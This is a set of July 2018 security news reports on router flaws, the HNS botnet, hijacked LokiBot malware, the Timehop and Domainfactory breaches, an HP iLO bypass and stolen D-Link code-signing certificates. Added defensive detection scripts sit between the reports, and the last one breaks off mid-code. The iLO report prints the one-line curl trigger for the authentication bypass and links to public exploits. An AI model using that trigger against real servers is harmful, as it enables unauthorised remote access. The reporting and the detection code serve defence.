Critical flaws patched in ISP Advanced Digital Broadcast Broadband devices

11.7.2018 securityaffairs Vulnerability

Advanced Digital Broadcast has rolled out security patches to fix three critical vulnerabilities in its broadband gear.
Advanced Digital Broadcast (ADB) has released patches for three critical vulnerabilities affecting its broadband gateways. All ADB broadband gateways and routers based on the Epicentro platform are affected.

The flaws, discovered nearly two years ago, are a privilege escalation bug, an authorization bypass issue, and a local jailbreak bug.

Advanced Digital Broadcast manufactures routers and network devices for dozens of broadband and telco firms.

The vulnerabilities were first discovered in June 2016 by experts at SEC Consult Vulnerability Lab.

The company started rolling out the patches in July 2017.


Let’s see in detail the three flaws:

CVE-2018-13108 is a local root jailbreak flaw that can be exploited by leveraging a vulnerability in the network file sharing feature.
“By exploiting the local root vulnerability on affected and unpatched devices an attacker is able to gain full access to the device with highest privileges,” according to researchers. “Attackers are able to modify any settings that might have otherwise been prohibited by the ISP. It is possible to retrieve all stored user credentials (such as VoIP) or SSL private keys.”

Experts explained that the “network file sharing” feature of ADB broadband devices uses a Samba daemon to give access to USB storage devices. The daemon runs with the highest access rights and exports the network shares with root user permissions. Attackers can abuse the Samba daemon that runs in the background to access the USB storage.

CVE-2018-13109 is an authorization bypass vulnerability that affects some firmware versions used in ADB broadband devices. It could be exploited by an attacker to gain access to device settings in the web interface that are otherwise forbidden to the user.
“By exploiting the authorization bypass vulnerability on affected and unpatched devices an attacker is able to gain access to settings that are otherwise forbidden for the user, e.g. through strict settings set by the ISP.” researchers wrote. “It is also possible to manipulate settings to e.g. enable the telnet server for remote access if it had been previously disabled by the ISP.”

CVE-2018-13110 is a privilege escalation vulnerability via Linux group manipulation that could be exploited by an attacker to gain access to the command line interface (CLI) of the device, even if the CLI was previously disabled by the ISP.
“By exploiting the group manipulation vulnerability on affected and unpatched devices an attacker is able to gain access to the command line interface (CLI) if previously disabled by the ISP.” researchers wrote.

“Depending on the feature-set of the CLI (ISP dependent) it is then possible to gain access to the whole configuration and manipulate settings in the web GUI and escalate privileges to highest access rights.”

ADB has released an updated firmware that addresses the flaws.


HNS Botnet evolves and targets cross-platform database solutions
11.7.2018 securityaffairs BotNet

The HNS IoT botnet (Hide and Seek) originally discovered by BitDefender in January evolves and now targets cross-platform database solutions.
Do you remember the Hide ‘N Seek (HNS) botnet?

The Hide ‘N Seek botnet appeared in the threat landscape in January, when it was first spotted on January 10th by malware researchers from Bitdefender. It then disappeared for a few days and reappeared a few weeks later, infecting more than 20,000 devices in less than a week.


Researchers at Bitdefender found similarities between the Hide ‘N Seek botnet and the Hajime botnet: unlike Mirai, Hajime doesn’t use C&C servers and instead relies on a peer-to-peer network.

Bitdefender experts discovered that Hide ‘N Seek botnet exploited the CVE-2016-10401 flaw, and other vulnerabilities to propagate malicious code and steal user data.

The HNS botnet looks for systems to infect by scanning the Internet on the fixed TCP ports 80, 8080, 2480, 5984 and 23, as well as other random ports. The HNS botnet borrows code from the Mirai botnet.
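The fixed port list above is the kind of thing a network defender can turn into a detection. The following is an added example (not code from the article, Bitdefender or Netlab): it reads firewall/NetFlow-style connection records and flags sources whose SYN attempts spread over many distinct destinations and concentrate on the HNS port set. The record format, the sample lines and the thresholds are assumptions made for the example.

```python
"""
Added example: flag sources that scan the HNS port set (80, 8080, 2480,
5984, 23) across many destinations. Log format and thresholds are assumed.
"""
from collections import defaultdict

# Ports the article names as fixed HNS scan targets.
HNS_PORTS = {80, 8080, 2480, 5984, 23}

# Constructed sample records: "timestamp src dst dport tcp_flags".
SAMPLE_LOG = """\
2018-07-11T10:00:01 198.51.100.7 203.0.113.10 80 S
2018-07-11T10:00:01 198.51.100.7 203.0.113.11 8080 S
2018-07-11T10:00:02 198.51.100.7 203.0.113.12 2480 S
2018-07-11T10:00:02 198.51.100.7 203.0.113.13 5984 S
2018-07-11T10:00:03 198.51.100.7 203.0.113.14 23 S
2018-07-11T10:00:03 198.51.100.7 203.0.113.15 41337 S
2018-07-11T10:00:04 192.0.2.5 203.0.113.10 80 S
2018-07-11T10:00:05 192.0.2.5 203.0.113.10 443 S
2018-07-11T10:00:06 192.0.2.9 203.0.113.20 22 S
"""


def parse_record(line):
    """Split one whitespace-separated record into its fields."""
    ts, src, dst, dport, flags = line.split()
    return {"ts": ts, "src": src, "dst": dst, "dport": int(dport), "flags": flags}


def detect_hns_like_scanners(lines, min_distinct_dsts=4, min_hns_ports=3):
    """Return {src: {"dsts": n, "hns_ports": [...]}} for every source that
    touched at least min_distinct_dsts destinations AND at least min_hns_ports
    of the HNS port set. Only SYN-only attempts (flags == 'S') are counted so
    established sessions do not inflate the numbers."""
    dsts = defaultdict(set)
    ports = defaultdict(set)
    for line in lines:
        if not line.strip():
            continue
        rec = parse_record(line)
        if rec["flags"] != "S":
            continue
        dsts[rec["src"]].add(rec["dst"])
        if rec["dport"] in HNS_PORTS:
            ports[rec["src"]].add(rec["dport"])
    hits = {}
    for src in dsts:
        if len(dsts[src]) >= min_distinct_dsts and len(ports[src]) >= min_hns_ports:
            hits[src] = {"dsts": len(dsts[src]), "hns_ports": sorted(ports[src])}
    return hits


if __name__ == "__main__":
    for src, info in detect_hns_like_scanners(SAMPLE_LOG.splitlines()).items():
        print(f"{src}: {info['dsts']} destinations, HNS ports {info['hns_ports']}")
```

Requiring both a spread of destinations and several ports from the set keeps a single host that legitimately talks to one web server on port 80 from being flagged; the thresholds should be tuned to the size of the monitored network.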


Hide ‘N Seek is now also targeting cross-platform database solutions, and it is currently the first IoT malware that implements a persistence mechanism to keep devices infected after reboots.

“P2P-like botnets are hard to take down, and the HNS botnet has been continuously updated over the past few months,” reads the analysis published by Netlab Qihoo 360 researchers.

“some major updates we see:

Added exploits for AVTECH devices (webcam, webcam), CISCO Linksys router, JAWS/1.0 web server, Apache CouchDB, OrientDB; with the two devices mentioned in the original report, HNS currently supports 7 exploiting methods all together
Hard-coded P2P node addresses have been increased to 171;
In addition, we observed that the HNS botnet adds a cpuminer mining program, it is not functioning properly yet.
In particular, with the added support of OrientDB and CouchDB database servers, HNS is no longer just an IoT botnet, but a cross-platform botnet now.”
According to Netlab, the Hide ‘N Seek (HNS) botnet now targets the following types of devices using the following exploits:
TPLink-Routers RCE
Netgear RCE
(new) AVTECH RCE
(new) CISCO Linksys Router RCE
(new) JAW/1.0 RCE
(new) OrientDB RCE
(new) CouchDB RCE
Experts pointed out that the HNS has also started dropping a miner payload, but the good news is that it is not functioning properly yet.

Further technical details on the Hide ‘N Seek botnet, including the IoCs, are reported in the analysis published by the Netlab team.


Smart Speaker Banking Is Coming to a Device Near You, But Is It Secure?
11.7.2018 securityaffairs Virus

Smart speaker banking is coming to a device near you. What are the cyber risks associated with its use? Is it a new opportunity for attackers?
The popularity of voice-activated smart speakers like the Google Home and Amazon Echo has made brands, and industries realize there’s adequate demand for introducing technology that lets people accomplish things just by speaking.

They can order items, check traffic in their areas and search for information, among other conveniences.

Soon, smart speaker owners can take care of their banking needs. Should you consider taking that approach, too?

Check Balances and Pay Credit Card Bills
Regional brand U.S. Bank is the first establishment in the financial industry to unveil online banking opportunities that work with all three virtual assistants — Alexa, Google Assistant and Siri — making it relevant to a significant segment of the market.

After a soft launch, U.S. Bank started marketing the option to its customers in June 2018. For now, customers can check their account balances and make credit card or mortgage payments. The brand is also reportedly considering letting people transfer money to other account holders.

Also, smaller banks and credit unions offer similar functionality. Capital One and American Express let people pay bills through their smart speakers, too.

Smart Speakers Could Reveal Private Details
Most skills for the Amazon Echo that emphasize productivity give audible information to users. The idea is that they can do things without fumbling with their phones or otherwise using their hands.

The banking apps that work with Amazon and Google smart speakers give information through spoken responses to verbal prompts.

In contrast, people using Apple’s Siri assistant can do some banking tasks with iOS apps that support Siri, but they only see their information displayed on screens. Banking skills are not available on Apple’s HomePod speaker yet, and the company hasn’t divulged if they’re on the horizon.

Imagine the privacy concerns if you use a smart speaker banking app, and it lets your mother-in-law — who’s temporarily living with you — know how much money is in your account because she overhears the speaker’s reply to your prompt?

That’s an example of how a feature that’s supposed to be convenient could instead broadcast sensitive details to others who are nearby.

Users Must Set Up PINs
The banks that provide information to smart speaker owners require people to set up four-digit PINs and recommend that they be different from the individuals’ ATM PINs. As with passwords, there are recommended ways to pick a good PIN, too. However, not everyone follows these. Many take the risk of prioritizing convenience over security by setting up PINs that are easy to remember but equally easy for others to guess.

Also, although the Google Assistant and Amazon’s Alexa support individual voice recognition, U.S. Bank hasn’t enabled that feature on the platform yet. Security analysts point out that even with voice recognition technology in place, hackers could still record a person speaking and play it back for the speaker to detect later.

And the PINs people enter at ATMs aren’t as secure as many people think. Criminals can use hidden cameras or false keypads to capture PINs as people put them into the machines.

Research also found the motion-sensitive components of smartwatches could capture PIN data, then allow hackers to figure out what numbers they enter with up to 80 percent accuracy on the first attempt.

You can probably envision a scenario where a determined hacker devises a plan to hear a person’s spoken PIN sent to a smart speaker, too.

For example, maybe a smart speaker owner is in the habit of using such a device that’s on a nightstand a few feet away from a window to check a bank account balance each morning. If someone realizes that individual often keeps that window open in hot weather and learns their banking routine, they could wait outside the window to hear the details.

Image by Rahul Chakraborty

The Potential for Misunderstood Transfer Requests
If you eventually have the option to transfer money with a smart speaker, that option may not be failsafe, either, especially if you have to utter the person’s name to confirm your request.

Smart speakers have highly sensitive microphones, but they still don’t pick up on everything correctly. In one case, a toddler said “Alexa, play Digger Digger,” and an Amazon Echo Dot started providing pornographic content while adults in the background frantically told it to stop.

What if a smart speaker misinterprets either the name of the person who should receive your money or the amount you want to send? In either case, you could find yourself dealing with a tricky situation that’s difficult to rectify.

Hackers Always Find Ways to Orchestrate Attacks
As with anything else, it’s crucial to weigh the pros and cons. Sure, it might be great to pay your credit card bill with only a vocal command, but are you willing to let a potentially vulnerable smart speaker possess some of your most lucrative information?

Because the possibility of banking with your smart speaker is still so new, speculation primarily informs musings about the security risks that convenience could bring. If smart speaker banking becomes a mainstream practice, hackers will undoubtedly intensify their efforts to break into the speakers and get details that could compromise victims’ financial situations.

About the Author:

Kayla Matthews is a technology and cybersecurity writer, and the owner of ProductivityBytes.com. To learn more about Kayla and her recent projects, visit her About Me page.


Hacker hijacked original LokiBot malware to sell samples in the wild
11.7.2018 securityaffairs Virus

An expert found evidence demonstrating that the currently distributed LokiBot malware samples were “hijacked” by a third actor.
According to the researcher who goes by the Twitter handle “d00rt,” the LokiBot samples being distributed in the wild are modified versions of the original malware.

d00rt
@D00RT_RM
I just released an article where are evidences that demonstrate the current distributed #LokiBot infostealer samples were "hijacked" by a third actor. In the repository there are Scripts for extracting the static config and code for disinfecting. https://github.com/d00rt/hijacked_lokibot_version/blob/master/doc/LokiBot_hijacked_2018.pdf …

10:25 AM - Jul 6, 2018

The LokiBot malware has been active since 2015. It is an infostealer that was involved in many malspam campaigns aimed at harvesting credentials from web browsers, email clients and admin tools, and it was also used to target cryptocurrency-wallet owners.
The original LokiBot malware was developed and sold online by a hacker who goes by the alias “lokistov” (aka Carter).

The malicious code was initially advertised on many hacking forums for up to $300, later other threat actors started offering it for less than $80 in the cybercrime underground.

According to d00rt, there is an explanation for this kind of proliferation: a threat actor may have “hijacked” the original malware and, even without direct access to the original source code, was able to offer other hackers the possibility to set up their own domains for receiving the stolen data.

The expert reversed many samples and found five references to the C&C server: four of them are encrypted using the Triple DES algorithm and one using a simple XOR cipher.

The malware uses the function “Decrypt3DESstring” to decrypt the encrypted strings and get the URL of the command-and-control server.

According to the expert, the Decrypt3DESstring found in the sample he analyzed is different from the one available in previous variants of the LokiBot malware.

The Decrypt3DESstring function discovered in the new samples always returns the value of the XOR-protected string instead of the Triple DES strings.

“The 3DES protected URLs are always the same in the all of the LokiBot samples of this version,” the researcher wrote.

“Therefore, those URLs are never used. Decrypt3DESstring returns a 3DES decrypted buffer. This should be the ideal behavior of this function, but as was described before, each time Decrypt3DESstring is called, it returns a decrypted url with XOR or encrypted url with XOR.”


The expert explained that anyone with a new sample of LokiBot could use a simple hex editor to modify the program and add their own URLs for receiving the stolen data.

“The newest (or the most extended) LokiBot samples are patched. There is a new section called “x” where is a xored url. That url is the control panel url. Keeping that in mind, it would be very easy to create a builder, for creating LokiBot samples with a new control panel and sell it. You could change the xored url with another xored url using a hex editor or with a simple script.” continues the analysis published by the expert.

“There exists a builder in the underground forums which is able to create new LokiBot samples with a custom control panel. As I explained before, this builder encrypts the control panel with xor and writes it in the “x” section.”

d00rt discovered several LokiBot samples available for sale on the underground market that were patched by using a builder available in the underground forums.

The author of LokiBot, meanwhile, has launched the new version 2.0 and is offering it on many forums.

The decryption function was also used to get the registry values required to make the malware persistent on a system, but since the patched decryption function only returns a URL, the new LokiBot samples fail to restart after the device reboots.

The expert also discovered that the modification used to patch the malware introduces a couple of bugs in the malicious code.

Some strings of LokiBot malware are encrypted and the malware uses the function Decrypt3DESstring to decrypt them. After patching this function, it always returns the same string that is the XORed url which is located at “x” section.

“The following is the registry key name used in persistence:
Software\Microsoft\Windows\CurrentVersion\Run
This registry key is encrypted using 3DES algorithm. When the patched LokiBot tries to get persistence, it uses Decrypt3DESstring to decrypt the registry key name. But because that function is patched, the returned string is the url at “x” section, instead of the registry key.”
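The tell-tale artefact of the hijacked samples, as described above, is a non-standard section named “x” holding a XOR-encoded control panel URL. The block below is an added example (not code from the article or from d00rt’s repository) of how an analyst triages a file for that artefact: it parses the PE section table, checks for an “x” section and tries to recover the URL. The article does not give the XOR key, so the recovery step brute-forces every single-byte key and accepts the one whose output starts with “http”; that heuristic, the in-memory sample file and the placeholder URL are assumptions of this example.

```python
"""
Added example: PE section-table triage for a LokiBot-style "x" section with
a XOR-encoded panel URL. The sample PE is constructed in memory and is not
a runnable executable; the key and URL are placeholders.
"""
import struct

SECTION_HDR = "<8sIIIIIIHHI"   # IMAGE_SECTION_HEADER layout (40 bytes)
COFF_HDR = "<HHIIIHH"          # IMAGE_FILE_HEADER layout (20 bytes)


def build_sample_pe(sections):
    """Build a minimal MZ/PE-shaped byte string with the given (name, data) sections."""
    dos = bytearray(64)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)          # e_lfanew: PE signature right after DOS header
    coff = struct.pack(COFF_HDR, 0x14C, len(sections), 0, 0, 0, 0, 0x0102)  # no optional header
    raw_ptr = 64 + 4 + 20 + 40 * len(sections)      # section data follows the section table
    table, payload = b"", b""
    for name, data in sections:
        table += struct.pack(SECTION_HDR, name, len(data), 0x1000, len(data), raw_ptr,
                             0, 0, 0, 0, 0x40000040)   # readable, initialized data
        raw_ptr += len(data)
        payload += data
    return bytes(dos) + b"PE\0\0" + coff + table + payload


def parse_sections(pe):
    """Walk the PE headers and return [{'name', 'raw', 'characteristics'}] per section."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    num_sections = struct.unpack_from("<H", pe, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", pe, e_lfanew + 20)[0]
    table = e_lfanew + 24 + opt_size                # section table follows the optional header
    sections = []
    for i in range(num_sections):
        name, _vsize, _vaddr, raw_size, raw_ptr, _, _, _, _, chars = struct.unpack_from(
            SECTION_HDR, pe, table + 40 * i)
        sections.append({
            "name": name.rstrip(b"\0").decode("latin-1"),
            "raw": pe[raw_ptr:raw_ptr + raw_size],
            "characteristics": chars,
        })
    return sections


def recover_xored_url(blob):
    """Try every single-byte XOR key; return (key, url) if the plaintext starts with 'http'."""
    for key in range(256):
        plain = bytes(b ^ key for b in blob)
        if plain.startswith(b"http"):
            return key, plain.rstrip(b"\0").decode("latin-1")
    return None


def triage(pe):
    """Report section names, whether an 'x' section exists and any URL recovered from it."""
    secs = parse_sections(pe)
    report = {"sections": [s["name"] for s in secs], "x_section": False, "c2": None}
    for s in secs:
        if s["name"] == "x":
            report["x_section"] = True
            hit = recover_xored_url(s["raw"])
            if hit:
                report["c2"] = hit[1]
    return report


# Constructed sample: ordinary sections plus an "x" section holding a XOR-encoded placeholder URL.
SAMPLE_KEY = 0x5A
SAMPLE_URL = b"http://c2.example.invalid/panel/"
SAMPLE_PE = build_sample_pe([
    (b".text", b"\x90" * 16),
    (b".data", b"\x00" * 8),
    (b"x", bytes(b ^ SAMPLE_KEY for b in SAMPLE_URL)),
])

if __name__ == "__main__":
    print(triage(SAMPLE_PE))
```

On a real file the same `parse_sections` call works on the bytes read from disk; the presence of the “x” section is the triage signal, and the recovered URL is the indicator to block or hunt for in proxy logs.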

Further technical details for the threat are reported in the research paper published by the expert on GitHub.


Timehop data breach, data from 21 million users exposed
11.7.2018 securityaffairs Incident

Timehop, the service that aims to help people in finding new ways to connect with each other by analyzing past activities, has been hacked.
Timehop is a service that aims to help people in finding new ways to connect with each other by analyzing past activities.

“Timehop created the digital nostalgia category and continues to be THE team reinventing reminiscing for the digital era. We have more “old” photos and content than ever before, yet most of the internet focuses on “new”.” reads its website.

The Timehop service leverages posts from many social networks to build its own memory and use it to create new connections, but something went wrong.

The company admitted that data describing 21 million members may have been exposed.

Unknown attackers breached its systems; the company discovered the intrusion while the hackers were still exfiltrating the data.

“On July 4, 2018, Timehop experienced a network intrusion that led to a breach of some of your data. We learned of the breach while it was still in progress, and were able to interrupt it, but data was taken. While our investigation into this incident (and the possibility of any earlier ones that may have occurred) continues, we are writing to provide our users and partners with all the relevant information as quickly as possible.” reads the data breach notification published by the company.

Stolen data includes names, email addresses, and some phone numbers, while no private/direct messages, financial data, or social media or photo content, or Timehop data including streaks were exposed.

The company pointed out that none of the users’ “memories” (the social media posts and photos that Timehop stores) were accessed by the attackers.

The company admitted that the hackers obtained credentials for its cloud computing environment, which was not protected by multifactor authentication.

The security team locked out the attackers two hours and nineteen minutes after discovering the intrusion.

The attackers also accessed the keys that let Timehop read and display users’ social media posts (but not private messages). In response to the incident, the company’s IT staff deactivated them, which means that users will have to re-authenticate in the app.


The bad news is that the security breach also exposed the access tokens used by Timehop to access other social networks such as Twitter, Facebook, and Instagram. Timehop tried to downplay the problem, explaining that the tokens were quickly revoked and currently don’t work.

“Second, we want to be clear that these tokens do not give anyone (including Timehop) access to Facebook Messenger, or Direct Messages on Twitter or Instagram, or things that your friends post to your Facebook wall. In general, Timehop only has access to social media posts you post yourself to your profile.” continues the company’s notification.“However, it is important that we tell you that there was a short time window during which it was theoretically possible for unauthorized users to access those posts – again, we have no evidence that this actually happened.“

Timehop is warning users who provided a phone number for authentication to take additional security precautions with their cellular provider to ensure that their number cannot be ported.

The company has now taken steps to improve the security of its architecture, including the adoption of multifactor authentication to secure authorization and access controls on all accounts.

Technical details about the incident have been published in this post.


HP iLO servers running outdated firmware could be remotely hacked
11.7.2018 securityaffairs Hacking

Hewlett Packard Integrated Lights-Out 4 (HP iLO 4) servers are affected by a critical authentication bypass vulnerability; technical details and PoC code have been published online.
The flaw, tracked as CVE-2017-12542, received a severity score of 9.8 out of 10 because it is very simple to exploit.

“Integrated Lights-Out, or iLO, is a proprietary embedded server management technology by Hewlett-Packard which provides out-of-band management facilities. The physical connection is an Ethernet port that can be found on most Proliant servers and microservers of the 300 and above series.” reads Wikipedia.

iLO cards allow administrators to perform a broad range of management activities in a company network, including installing firmware remotely and providing access to a remote console.

The flaw was discovered last year by three security researchers (Fabien Périgaud from Synacktiv, Alexandre Gazet from Airbus, and the independent security researcher Joffrey Czarny) and potentially puts any iLO server exposed online at risk.

The flaw could be exploited by a remote unauthenticated attacker to access HP iLO consoles, extract cleartext passwords, execute malware, and even replace the iLO firmware.

The experts discovered that it is possible to exploit the issue by using a cURL request with 29 “A” characters:

curl -H "Connection: AAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
In the following images, the experts demonstrate how to bypass iLO authentication, in this case to retrieve a local user’s password in cleartext.

The good news is that HP addressed the flaw in August 2017 with the release of iLO 4 firmware version 2.54; for this reason, system administrators need to upgrade their servers.

The flaw affects HP iLO 4 servers running firmware version prior to 2.53.
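Two checks follow from the two facts above: the request that triggers the bypass carries an abnormally long Connection header, and the fix is a firmware version. The block below is an added example (not the researchers’ PoC and not HP code) showing both from the defender’s side: a request inspector that flags a Connection header of 29 characters or more, and a version comparison against 2.54, the fixed release the article names. The sample requests, the placeholder request paths and the host name are constructed for this example and are not real iLO endpoints.

```python
"""
Added example: defender-side checks for the HP iLO 4 authentication bypass
(CVE-2017-12542). Sample requests and paths are placeholders.
"""
import re

PATCHED_VERSION = (2, 54)   # iLO 4 firmware release the article says fixed the flaw
TRIGGER_LEN = 29            # Connection header length the article says triggers the bypass


def parse_version(version):
    """Turn 'major.minor' (e.g. '2.53') into a comparable tuple."""
    m = re.fullmatch(r"\s*(\d+)\.(\d+)\s*", version)
    if not m:
        raise ValueError(f"unrecognised iLO firmware version: {version!r}")
    return int(m.group(1)), int(m.group(2))


def firmware_vulnerable(version):
    """True if the firmware predates the patched release."""
    return parse_version(version) < PATCHED_VERSION


def parse_request(raw):
    """Split a raw HTTP/1.1 request into (request line, {lowercased header: value})."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def flag_request(raw):
    """Return (flagged, reason) for one raw request; flags an over-long Connection header."""
    request_line, headers = parse_request(raw)
    conn = headers.get("connection", "")
    if len(conn) >= TRIGGER_LEN:
        return True, f"Connection header of {len(conn)} chars on '{request_line}'"
    return False, ""


# Constructed samples: a normal request and one shaped like the article's cURL trigger.
BENIGN_REQUEST = (
    "GET /placeholder/resource HTTP/1.1\r\n"
    "Host: ilo.example.invalid\r\n"
    "Connection: keep-alive\r\n\r\n"
)
SUSPICIOUS_REQUEST = (
    "GET /placeholder/resource HTTP/1.1\r\n"
    "Host: ilo.example.invalid\r\n"
    "Connection: " + "A" * 29 + "\r\n\r\n"
)

if __name__ == "__main__":
    for req in (BENIGN_REQUEST, SUSPICIOUS_REQUEST):
        print(flag_request(req))
    for v in ("2.53", "2.54", "2.60"):
        print(v, "vulnerable" if firmware_vulnerable(v) else "patched")
```

The header check is a stop-gap for a reverse proxy or IDS in front of management interfaces that cannot be patched immediately; the version check belongs in the inventory script that enumerates iLO firmware across the fleet. Neither replaces upgrading to 2.54 or keeping iLO off the public Internet.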

The experts presented their findings at several security conferences, including ReCon Brussels (slides, research paper) and SSTIC 2018.

The PoC exploits for the flaw are available at the following URLs:

https://www.exploit-db.com/exploits/44005/
https://github.com/skelsec/CVE-2017-12542/blob/master/exploit_1.py
A Metasploit module for the flaw is available here.


GoDaddy-owned hosting company Domainfactory hacked
11.7.2018 securityaffairs Hacking

The hosting company Domainfactory has taken down its forums after hackers posted messages claiming to have breached its infrastructure.
While I was writing about the Timehop security breach, another incident is making the headlines, the victim is the German hosting company Domainfactory.

The hosting company, which has been owned by GoDaddy since 2016, has taken down its forums after hackers posted messages informing visitors that they had breached the Domainfactory infrastructure.

Source Heise.de

The company notified the data breach to the customers and asked them to change their passwords.

“On July 3, 2018, a person in the DomainFactory forum claimed access to DomainFactory customer data. We initiated a detailed investigation and found that customer data was accessed by an outside party without authorization. The access route is now secured.” wrote a company representative.

“We contact all customers with the recommendation to update their DomainFactory passwords. Instructions for changing your passwords can be found here:
https://www.df.eu/blog/pw/

We have notified the data protection authority and commissioned external experts with the investigation. The protection of the data of our customers is paramount and we regret the inconvenience this incident causes, very much.”

The company notified the data protection authorities and is investigating the hack with the help of external experts.

The Domainfactory staff first learned of the incident in the early evening of July 3, 2018; the security team dated the breach to January 28, 2018.

A first investigation confirmed that unauthorized third parties could have had access to several categories of data, including customer name, company name, customer number, address, email addresses, phone number, DomainFactory phone password, date of birth, bank name and account number (e.g. IBAN or BIC), and Schufa score.

In response to the attack, the company secured the breached systems.

The hack was disclosed by the German media outlet Heise, which noticed the strange messages posted by the hackers on the forums.

The German journalist Fabian Scherschel also posted on Twitter (in German), before public disclosure of the incident, that he had noticed a thread “in which lots of #Domainfactory customers ask a hacker about their data because DF does not respond to their requests.”

Fabian A. Scherschel
@fabsh
I’m sitting here in a Twitter thread in which lots of #Domainfactory customers are asking a hacker about their data because DF isn’t responding to their requests. Is this already #PostDSGVO? 😅

Background: https://heise.de/-4104495

5:16 PM - Jul 7, 2018

According to Heise, the hackers exploited a variant of the Dirty Cow flaw to breach the systems.


Polar fitness app broadcasted sensitive data of intelligence and military personnel
11.7.2018 securityaffairs BigBrothers

The mobile fitness app Polar has suspended its location tracking feature due to the leakage of sensitive data on military and intelligence personnel.
A new privacy incident involves a fitness application and the military: this time the mobile fitness app Polar has suspended its location tracking feature due to the leakage of sensitive data on military and intelligence personnel from 69 countries.

This is the second such incident in a few months: in January, experts discovered that military personnel worldwide had publicly shared online their exercise routes recorded through the fitness tracker Strava, revealing fitness sessions conducted inside or near military bases.

During the weekend, Dutch security experts revealed they were able to find data on some 6,000 individuals including military personnel from dozens of countries and FBI and National Security Agency personnel.

According to an investigation by the news website Bellingcat and the Dutch news outlet De Correspondent, the fitness devices were leaking data belonging to military or intelligence officials that could be exploited by threat actors to spy on them.

“With only a few clicks, a high-ranking officer of an airbase known to host nuclear weapons can be found jogging across the compound in the morning,” explained the security researcher Foeke Postma, who investigated the case with the Dutch news outlet De Correspondent.

“We can find Western military personnel in Afghanistan through the Polar site. Cross-checking one name and profile picture with social media confirmed one soldier or officer’s identity.”


The experts discovered detailed personal information, including home addresses, of military personnel, persons serving on submarines, Americans in the Green Zone in Baghdad and Russian soldiers in Crimea.

The exposure of such data poses serious risks to the military personnel as reported in a post published by Defensenews.com.

“Bellingcat was able to pinpoint the name of a “high-ranking officer” at a base known to host nuclear weapons. It took just a few clicks. Using the Polar Flow app and other information found on the internet, De Correspondent was able to collect a disturbing amount of one Dutch soldier’s personal information.” reads the blog post published by Defensenews.com.

“They found the name of the soldier, the fact he was stationed at one of the key locations where the war against the Islamic State is being waged from, the soldier’s home address, and the names of his wife and kids.”

In response to the privacy incident, Polar has disabled the feature that allowed users to share data and pointed out that any data made public was the result of users who opted in to location tracking.

The company has already implemented a number of measures to mitigate the exposure of its users, along with the suspension of the Flow Explore feature until further notice.

The location tracking feature allows thousands of athletes all over the world to share data related to their training sessions every day.

“If there hasn’t been a data breach, why have you suspended the Explore feature?

While the decision to opt-in and share training sessions and GPS location data is the choice and responsibility of the customer, we are aware that potentially sensitive locations were appearing in public data, and have made the decision to suspend the Explore until further notice.” reads the statement published by Polar.

“I have seen statements that suggest that Polar leaked data. Did Polar leak any data? Contrary to what has been reported—it’s important to clarify that Polar has not leaked any data. Furthermore, there has been no breach of private data.”

The De Correspondent investigation revealed that only about two percent of Polar users chose to share their data, but journalists and experts were still able to collect sensitive data on military and civilian personnel.

“We found the names and addresses of personnel at military bases including Guantanamo Bay in Cuba, Arbil in Iraq, Gao in Mali, and bases in Afghanistan, Saudi Arabia, Qatar, Chad, and South Korea,” states the De Correspondent report.


BlackTech APT using stolen D-Link certificates to spread malware
11.7.2018 securityaffairs APT

A cyber-espionage group tracked as BlackTech is abusing code-signing certificates stolen from D-Link for the distribution of their malware.
Security experts from ESET discovered that an APT group tracked as BlackTech is using code-signing certificates stolen from the Taiwan-based tech firm D-Link and the security company Changing Information Technology Inc.

According to the experts, the cyber espionage group is highly skilled and most of its victims are in the East Asia region, particularly Taiwan.

The attackers used the certificates to sign the code of the Plead backdoor that has been in the wild since at least 2012.

The Plead backdoor was used by threat actors to exfiltrate confidential documents from Taiwanese government agencies and private organizations.

“We spotted this malware campaign when our systems marked several files as suspicious. Interestingly, the flagged files were digitally signed using a valid D-Link Corporation code-signing certificate.” reads the analysis published by ESET.

“The exact same certificate had been used to sign non-malicious D-Link software; therefore, the certificate was likely stolen.”


ESET reported the abuse to D-Link, which revoked two certificates on July 3 and informed its customers that most of them should not be affected by the revocation.

“D-Link recently discovered that two of its code signing certificates were misappropriated. Upon discovery, we immediately decommissioned the certificates and investigated the issue.” reads the advisory published by D-Link.

“Like several other companies in Asia, D-Link was victimized by a highly active cyber espionage group which has been using PLEAD Malware to steal confidential information from companies and organizations based in East Asia, particularly in Taiwan, Japan, and Hong Kong. The two affected D-Link certificates were revoked, effective July 3rd, 2018. New certificates have been issued to resolve this problem.”

Taiwan-based Changing Information Technology Inc. revoked the abused certificate on July 4, but according to ESET, the hackers continued to use it to spread the malware.

ESET identified two different malware families that were abusing the stolen certificate, the Plead backdoor, and a related password stealer component that could gather saved passwords from Google Chrome, Microsoft Internet Explorer, Microsoft Outlook, and Mozilla Firefox.

The signed Plead samples are heavily obfuscated with junk code. They either download from a remote server, or open from the local disk, a small encrypted binary blob; the blob contains encrypted shellcode that downloads the final Plead backdoor module.

Why do the attackers steal digital certificates?

Attackers sign malicious code with stolen certificates so that the malware looks like a legitimate, vendor-signed application and passes security checks that trust a valid signature.

The best-known case of malware abusing code-signing certificates is the Stuxnet worm, which misused digital certificates stolen from Realtek and JMicron.
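A valid signature made with a stolen certificate is exactly the situation ESET describes, and revocation does not settle it: Authenticode keeps accepting signatures that carry a trusted timestamp earlier than the revocation date (which is why D-Link could tell customers that most of them would not be affected), and the Changing Information Technology certificate was still being used after it was revoked. The following added example, which is not ESET's or D-Link's code, triages signature records the way a responder would, against a revocation list with effective dates and a vendor release-hash list. The records, issuer name, serial numbers, hashes and signing dates are constructed placeholders, not the real certificate details; only the 3 July 2018 revocation date comes from D-Link's advisory.

```python
"""Added example (not ESET's or D-Link's code): revocation-aware triage of
Authenticode-signed files. Records are constructed to look like what a
signature-extraction tool reports; issuer name, serials, hashes and signing
dates are placeholders. Only the 2018-07-03 revocation date is D-Link's."""
from dataclasses import dataclass
from datetime import datetime
from typing import FrozenSet, Iterable, Optional


@dataclass(frozen=True)
class Revocation:
    issuer: str          # issuing CA as printed in the certificate
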